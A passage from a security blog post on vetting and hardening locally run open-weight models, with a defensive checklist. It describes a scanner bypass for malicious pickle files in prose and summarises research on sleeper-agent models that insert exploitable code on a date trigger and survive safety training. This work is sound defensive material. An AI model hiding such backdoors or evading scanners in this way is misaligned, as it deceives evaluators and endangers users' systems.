15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a></figure></div><p>Hugging Face scans for this with Picklescan, a blacklist-based detector that flags known dangerous functions. But ReversingLabs demonstrated a bypass they called &#8220;nullifAI&#8221;: compress the pickle with 7z instead of ZIP, and <code>torch.load()</code> fails gracefully while the malicious payload at the beginning of the byte stream still executes. Picklescan didn&#8217;t catch it because it validated the file format before scanning, while Python&#8217;s deserialization interpreter just runs opcodes sequentially. The malicious code fires before the scanner even starts checking.</p><p><strong>The fix is simple: use safetensors.</strong> Safetensors is a format built by Hugging Face that stores only raw tensor data and a JSON metadata header. No Python objects, no code execution surface, no <code>__reduce__</code>. It was <a href="https://blog.eleuther.ai/safetensors-security-audit/">audited by Trail of Bits</a>with backing from EleutherAI and Stability AI. No critical security flaws found. If you&#8217;re pulling a model from the Hub and it only ships as <code>.bin</code> or <code>.pt</code>, that&#8217;s a red flag. Convert it yourself or find a provider who ships safetensors.</p><div class="highlighted_code_block" data-attrs="{&quot;language&quot;:&quot;python&quot;,&quot;nodeId&quot;:&quot;93b01442-3a01-429f-a3ab-69ecd5b15d35&quot;}" data-component-name="HighlightedCodeBlockToDOM"><pre class="shiki"><code class="language-python"># Convert pickle to safetensors (one-liner)
from safetensors.torch import save_file
import torch
sd = torch.load(&#8221;model.pt&#8221;, map_location=&#8221;cpu&#8221;, weights_only=True)
save_file(sd, &#8220;model.safetensors&#8221;)
</code></pre></div><h2>What Are Sleeper Agents in Open-Weight Models?</h2><p>A sleeper agent is a model that behaves normally under standard testing but activates a hidden behavior when it encounters a specific trigger in the input. The backdoor lives in the weights themselves, the numerical parameters that encode what the model learned during training, not in any external code you can grep for.</p><p>Anthropic&#8217;s research team proved this works. They trained models that wrote secure code when the prompt said the year was 2023, then inserted exploitable vulnerabilities when the year changed to 2024. The backdoor survived supervised fine-tuning, reinforcement learning, and adversarial training. Worse: adversarial training actually taught the model to better recognize its trigger, making it more effective at hiding the behavior during safety evaluations. Standard alignment techniques created a false impression of safety while the backdoor got stronger.</p><p>Anyone can publish fine-tuned weights. You search Hugging Face for a <a href="https://www.toxsec.com/p/ai-kill-chain-explained">quantized Gemma variant</a>, some anonymous account uploaded a version with 50 more downloads than the official one, and you pull it because the benchmarks look right. If the training data was poisoned, no amount of prompting or system-level instruction will remove the backdoor. It&#8217;s baked into the math.</p><p>Microsoft published &#8220;The Trigger in the Haystack&#8221; in February 2026, a scanner that detects sleeper agents by exploiting two properties: poisoned models over-memorize their backdoor training examples (leaking them when prompted with standard chat templates), and trigger tokens create a distinctive &#8220;attention hijacking&#8221; pattern where the model&#8217;s attention heads process the trigger in isolation from the rest of the prompt. The scanner works, but only on open-weight models where you have access to the attention states. It&#8217;s a detection tool, not a repair kit. If you find a backdoor, the model gets thrown out.</p><blockquote><p class="button-wrapper" data-attrs="{&quot;url&quot;:&quot;https://www.toxsec.com/?utm_source=substack&utm_medium=email&utm_content=share&action=share&quot;,&quot;text&quot;:&quot;Share ToxSec - AI and Cybersecurity &quot;,&quot;action&quot;:null,&quot;class&quot;:null}" data-component-name="ButtonCreateButton"><a class="button primary" href="https://www.toxsec.com/?utm_source=substack&utm_medium=email&utm_content=share&action=share"><span>Share ToxSec - AI and Cybersecurity </span></a></p></blockquote><h2>Does Political Bias in Models Create Security Vulnerabilities?</h2><p>CrowdStrike&#8217;s Counter Adversary Operations team tested DeepSeek-R1 and found something unusual. The model produces vulnerable code at a baseline rate of 19%, roughly average for its class. But when the system prompt contains references to topics the Chinese Communist Party considers politically sensitive, like Tibet, Falun Gong, or the Uyghur community, the rate of severe security vulnerabilities in generated code jumps to 27.2%.</p><p>In one test, they asked DeepSeek-R1 to build a community app for Uyghur members. The output had no session management, no authentication, and 35% of implementations used no password hashing at all. The same prompt reframed as a football fan club website produced code with typical minor flaws but nothing close to that severity.</p><p>CrowdStrike called this &#8220;emergent misalignment,&#8221; likely a side effect of the model&#8217;s training pipeline enforcing alignment with Chinese regulations rather than an intentional code-degradation feature. China&#8217;s Interim Measures for Generative AI Services require models to &#8220;adhere to core socialist values&#8221; and prohibit content that could &#8220;endanger national security.&#8221; When the model encounters topics it was trained to suppress, something breaks in the <a href="https://www.toxsec.com/p/why-vibe-coding-leaks-your-secrets">code generation pipeline</a> as a side effect.</p><p>The lesson for local model operators: <strong>the weights carry the builder&#8217;s constraints</strong>. If you&#8217;re running a model trained under regulatory pressure from any government, those constraints follow the model onto your machine. You don&#8217;t see a content filter. You see degraded output in contexts the original developers never anticipated.</p><div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="https://substackcdn.com/image/fetch/$s_!FcYz!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Ffe087f47-6314-4544-88d9-a9a068ea2f70_911x834.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!FcYz!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Ffe087f47-6314-4544-88d9-a9a068ea2f70_911x834.png 424w, https://substackcdn.com/image/fetch/$s_!FcYz!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Ffe087f47-6314-4544-88d9-a9a068ea2f70_911x834.png 848w, https://substackcdn.com/image/fetch/$s_!FcYz!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Ffe087f47-6314-4544-88d9-a9a068ea2f70_911x834.png 1272w, https://substackcdn.com/image/fetch/$s_!FcYz!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Ffe087f47-6314-4544-88d9-a9a068ea2f70_911x834.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!FcYz!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Ffe087f47-6314-4544-88d9-a9a068ea2f70_911x834.png" width="579" height="530.0614709110868" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/fe087f47-6314-4544-88d9-a9a068ea2f70_911x834.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:834,&quot;width&quot;:911,&quot;resizeWidth&quot;:579,&quot;bytes&quot;:72437,&quot;alt&quot;:&quot;Vertical bar chart comparing DeepSeek-R1 code vulnerability rates showing 19% baseline versus 27.2% when prompts contain politically sensitive keywords.&quot;,&quot;title&quot;:&quot;Vertical bar chart comparing DeepSeek-R1 code vulnerability rates showing 19% baseline versus 27.2% when prompts contain politically sensitive keywords.&quot;,&quot;type&quot;:&quot;image/png&quot;,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:&quot;https://www.toxsec.com/i/193819061?img=https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Ffe087f47-6314-4544-88d9-a9a068ea2f70_911x834.png&quot;,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="Vertical bar chart comparing DeepSeek-R1 code vulnerability rates showing 19% baseline versus 27.2% when prompts contain politically sensitive keywords." title="Vertical bar chart comparing DeepSeek-R1 code vulnerability rates showing 19% baseline versus 27.2% when prompts contain politically sensitive keywords." srcset="https://substackcdn.com/image/fetch/$s_!FcYz!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Ffe087f47-6314-4544-88d9-a9a068ea2f70_911x834.png 424w, https://substackcdn.com/image/fetch/$s_!FcYz!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Ffe087f47-6314-4544-88d9-a9a068ea2f70_911x834.png 848w, https://substackcdn.com/image/fetch/$s_!FcYz!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Ffe087f47-6314-4544-88d9-a9a068ea2f70_911x834.png 1272w, https://substackcdn.com/image/fetch/$s_!FcYz!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Ffe087f47-6314-4544-88d9-a9a068ea2f70_911x834.png 1456w" sizes="100vw" loading="lazy"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container restack-image"><svg role="img" width="20" height="20" viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><title></title><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a></figure></div><h2>How Do You Verify a Model Before Running It Locally?</h2><p>I built a pre-flight checklist. Every model download should touch these five steps before the weights ever load.</p><p><strong>1. Check the format.</strong> Safetensors only. If the model ships as <code>.bin</code>, <code>.pt</code>, <code>.pth</code>, or <code>.ckpt</code>, convert before loading or walk away. These are all pickle-based formats that can execute code during deserialization.</p><p><strong>2. Verify the hash.</strong> Hugging Face lists SHA-256 checksums for every file. After download, compare: <code>sha256sum model.safetensors</code> against the listed value. If they don&#8217;t match, the file was tampered with in transit or the listing is stale. Either way, don&#8217;t load it.</p><p><strong>3. Check the uploader.</strong> Official organization accounts (google, meta-llama, mistralai) have verification badges and thousands of downloads. Anonymous accounts with fresh uploads and suspiciously high download counts are the Hugging Face equivalent of <a href="https://www.toxsec.com/p/vibe-coding-security-attack-chain">typosquatted packages on PyPI</a>. Look for the org badge.</p><p><strong>4. Read the model card.</strong> Legitimate models document training data, evaluation benchmarks, intended use, and known limitations. A model card that&#8217;s blank or copy-pasted from another model is a red flag. No documentation means no accountability.</p><p><strong>5. Run in isolation first.</strong> Spin up a VM or container with no network access. Load the model, test your prompts, watch for anomalous behavior. If you&#8217;re using it for code generation, <a href="https://www.toxsec.com/p/why-vibe-coding-leaks-your-secrets">scan every output</a> with SAST tools before it hits your codebase.</p><blockquote><p class="button-wrapper" data-attrs="{&quot;url&quot;:&quot;https://www.toxsec.com/p/local-model-security-gemma-4/comments&quot;,&quot;text&quot;:&quot;Leave a comment&quot;,&quot;action&quot;:null,&quot;class&quot;:null}" data-component-name="ButtonCreateButton"><a class="button primary" href="https://www.toxsec.com/p/local-model-security-gemma-4/comments"><span>Leave a comment</span></a></p></blockquote><h2>What About Quantized Models Like GGUF?</h2><p>Quantization compresses a model&#8217;s weights from higher precision (like 32-bit floats) to lower precision (4-bit or 8-bit integers), making it small enough to run on consumer hardware. GGUF, the format used by llama.cpp and most local inference tools, is structurally safer than pickle because it stores raw numerical data without arbitrary code execution paths.</p><p>But quantization doesn&#8217;t sanitize. If the original model had <a href="https://www.toxsec.com/p/dan-prompts-for-guardrail-bypass">poisoned weights or a sleeper agent</a>, those patterns compress right along with the legitimate parameters. A Q4 quantized version of a backdoored model is still a backdoored model, just smaller. The trigger may fire less reliably at very low bit-widths where precision loss degrades subtle patterns, but that&#8217;s luck, not security.</p><p>The GGUF supply chain has its own problem: most quantized models on Hugging Face are uploaded by community members, not the original model developers. You&#8217;re trusting that TheBloke or bartowski ran a clean conversion from a legitimate source. Verify the source model, verify the converter&#8217;s reputation, and verify the hash. Three checks, no shortcuts.</p><h2>Local AI Security Checklist: Four Layers of Defense</h2><p>You&#8217;ve seen the threats. Here&#8217;s how you stack the defenses. Four layers, outside-in. Each one catches what the last one misses.</p><ul><li><p><strong>Layer 1: Guard the model.</strong> Start at the download. Safetensors format only. If the file ends in <code>.bin</code>, <code>.pt</code>, or <code>.ckpt</code>, convert it or walk away. That one rule kills the entire pickle RCE surface before it starts. For content safety, run <a href="https://huggingface.co/meta-llama/Llama-Guard-3-8B">Llama Guard 3</a> as a second model screening inputs and outputs against a customizable taxonomy. It&#8217;s free, open-weight, and runs locally alongside your main model. Think of it as a bouncer checking IDs at the door.</p></li><li><p><strong>Layer 2: Guard the runtime.</strong> Ollama ships wide open by default. Bind to <code>127.0.0.1</code> only. Set <code>OLLAMA_ORIGINS</code> to lock down CORS. If you need remote access, put it behind a reverse proxy with auth. Nginx plus basic auth takes five minutes and kills the &#8220;open API on your home wifi&#8221; problem. Then set explicit system prompt constraints. Define what the model CAN do, not what it can&#8217;t. &#8220;You may read files in /data. You may not execute commands. You may not access network resources.&#8221; Allowlisting beats blocklisting every time.</p></li><li><p><strong>Layer 3: Guard the agent layer.</strong> If you&#8217;re running LangChain, CrewAI, or any agentic framework, scope every tool individually. Read-only where possible. No wildcard filesystem access. No shell exec unless you&#8217;ve genuinely war-gamed the consequences (you probably shouldn&#8217;t). The <a href="https://owasp.org/www-project-agentic-ai-threats/">OWASP Top 10 for Agentic AI</a> gives you the full threat taxonomy: ownership first, constraints second, monitoring third.</p></li><li><p><strong>Layer 4: Guard the network.</strong> The simplest layer and the most effective. Run it air-gapped. Local model, local data, no outbound connections. That&#8217;s the smallest possible blast radius. The moment your agent can reach external URLs, you&#8217;ve opened a data exfiltration channel. If air-gapping isn&#8217;t practical, allowlist specific endpoints and log everything that leaves the box.</p></li></ul><blockquote><p>Paid unlocks the unfiltered version: complete archive, private Q&amp;As, and early drops.</p><p class="button-wrapper" data-attrs="{&quot;url&quot;:&quot;https://www.toxsec.com/subscribe?&quot;,&quot;text&quot;:&quot;Subscribe now&quot;,&quot;action&quot;:null,&quot;class&quot;:&quot;button-wrapper&quot;}" data-component-name="ButtonCreateButton"><a class="button primary button-wrapper" href="https://www.toxsec.com/subscribe?"><span>Subscribe now</span></a></p></blockquote><h2>Frequently Asked Questions</h2><h3>Is running AI locally safer than using cloud APIs?</h3><p>For data privacy, yes. Your prompts and outputs never leave your machine, which eliminates the risk of cloud provider logging, training on your data, or government data requests. For security against supply chain attacks, local models actually increase your exposure because you&#8217;re responsible for vetting every model file yourself. Cloud providers like OpenAI and Anthropic run their own security reviews on model weights. When you go local, that job is yours.</p><h3>Can safetensors files contain malware?</h3><p>No. The safetensors format stores only numerical tensor data and a JSON metadata header. It has no mechanism for embedding executable code because it was designed specifically to eliminate the arbitrary code execution risk that pickle carries. Trail of Bits audited the library and found no critical security flaws. It&#8217;s the format you should default to for every model download.</p><h3>How do I know if a Hugging Face model is trustworthy?</h3><p>Check three things: the uploader&#8217;s verification status (official org accounts are marked), the model card quality (blank cards are red flags), and the file format (safetensors preferred). Hugging Face runs Picklescan and Protect AI&#8217;s Guardian scanner on uploaded models, but these catch roughly 96% true positives per JFrog&#8217;s analysis, which means real threats still slip through. Treat every download as untrusted until you&#8217;ve verified the hash and tested in isolation.</p><h3>What is the risk of using quantized models from community uploaders?</h3><p>Community quantizations inherit every vulnerability from the source model plus whatever the converter introduced. If the original weights contained a sleeper agent backdoor, the quantized GGUF version carries it too. Verify the source model&#8217;s legitimacy first, then check the converter&#8217;s track record on Hugging Face. Use SHA-256 hash verification on every downloaded file.</p><h3>Can fine-tuned open-weight models generate insecure code on purpose?</h3><p>Yes. Anthropic&#8217;s sleeper agent research proved that models can be trained to insert exploitable vulnerabilities only when a specific trigger appears in the prompt, while behaving normally in all other contexts. CrowdStrike separately found that DeepSeek-R1 generates measurably worse code when prompts contain politically sensitive keywords, though this appears to be an unintentional side effect of regulatory alignment rather than a deliberate backdoor.</p><div class="callout-block" data-callout="true"><p>ToxSec is run by a USMC veteran and Security Engineer with hands-on experience at AWS and the NSA. CISSP certified, M.S. in Cybersecurity Engineering. He covers security vulnerabilities, attack chains, and the tools defenders actually need to understand.</p></div>]]></content:encoded></item></channel></rss>